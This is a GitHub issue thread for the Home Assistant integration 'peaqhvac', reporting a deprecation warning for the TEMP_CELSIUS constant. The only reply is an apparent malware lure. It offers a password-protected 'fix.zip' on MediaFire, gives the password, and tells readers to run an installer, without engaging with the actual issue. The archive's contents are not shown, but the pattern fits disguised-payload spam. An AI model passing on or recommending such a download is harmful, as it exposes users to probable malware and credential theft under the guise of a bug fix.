### ISSUE TITLE
TEMP_CELSIUS deprecated

### ISSUE THREAD

**Issue by enoch85** [elden1337/hass-peaqhvac#121]
Logger: homeassistant.const
Source: helpers/deprecation.py:197
First occurred: 05:45:33 (1 occurrences)
Last logged: 05:45:33

TEMP_CELSIUS was used from peaqhvac, this is a deprecated constant which will be removed in HA Core 2025.1. Use UnitOfTemperature.CELSIUS instead, please report it to the author of the 'peaqhvac' custom integration

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
